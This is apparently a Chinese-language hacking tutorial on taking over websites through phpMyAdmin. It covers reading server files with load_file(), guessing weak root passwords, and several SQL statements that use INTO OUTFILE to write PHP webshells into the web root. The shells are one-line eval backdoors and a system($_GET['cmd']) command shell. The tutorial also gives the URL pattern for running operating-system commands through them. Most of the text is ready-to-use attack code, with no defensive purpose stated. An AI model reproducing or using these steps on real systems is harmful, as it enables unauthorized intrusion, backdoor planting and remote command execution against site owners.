phpmyadmin执行语句拿webshell及更详细方法拿webshell

phpmyadmin执行语句拿webshell

root密码可以通过以下方法进行尝试：

方法：load_file()

C:boot.ini
load_file(0x433A5C626F6F742E696E69) 16进制
load_file(char(67,58,92,98,111,111,116,46,105,110,105)) ascii
Conn.php config.php mainconn.php

很多情况有时候管理员没有修改root密码那么可以通过弱口令root  root  rrot 123 等 密码来进行尝试登录

当我们或者了phpmyadmin的最高权限root权限后,且已知网站的物理路径 （物理路径一般在网站后台会有显示 ）

就可以通过一下sql语句来获得网站的webshell。

假设网站的物理路径是 C:htdocs

就可以执行下面的SQL语句

----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile ' C:/htdocs/1.php';  （这里的要把网站的物理路径的修改为/）
Drop TABLE IF EXISTS a;
----end code---


执行语句后如果提示以上信息说明SQL语句已经执行成功。然后就可以在网站根目录后面加上1.php就可以直接获得一句话。

然后通过一句话客户端来链接就可以获得网站的webshell了。


更为详细的方法：

第一种

CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>');
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/exehack.php';
DROP TABLE IF EXISTS `darkmoon`;

(这种方法是最为常见的成功率也比较高,懂sql语句的朋友一眼就应该可以看懂什么意思）
以上代码意思就是选择musql数据库 然后建立一个darkmoon的表然后加入一个名字为darkmoon1的字段
然后在darkmoon1的字段中插入一句话代码
然后从darkmoon1字段里面导出一句话到d:/wamp/www/exehack.php 的文件名（这里的路径就是网站的程序路径）
最后就是删除darkmoon这个表。

第二种方法

Create TABLE moon (darkmoon text NOT NULL);
Insert INTO moon (darkmoon) VALUES('<?php @eval($_POST[pass]);?>');
select darkmoon from moon into outfile 'd:/wamp/www/exehack.php';
Drop TABLE IF EXISTS moon;

以上方法原理基本与方法一一致

第三种方法：

select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/exehack.php'

第四种方法

select '<?php echo '<pre>';system($_GET['cmd']); echo '</pre>'; ?>' INTO OUTFILE 'd:/wamp/www/exehack.php'

不同之处在于导出成功后可以直接执行DOS命令（只要权限够大）
使用方法:www.xxx.com/exehack.php?cmd=  (cmd=后面直接执行dos命令)
以上4种方法一般情况下足够拿到网站的webshell权限了。
如果你知道网站的物理路径的话可以尝试一下方法或者网站的物理路径。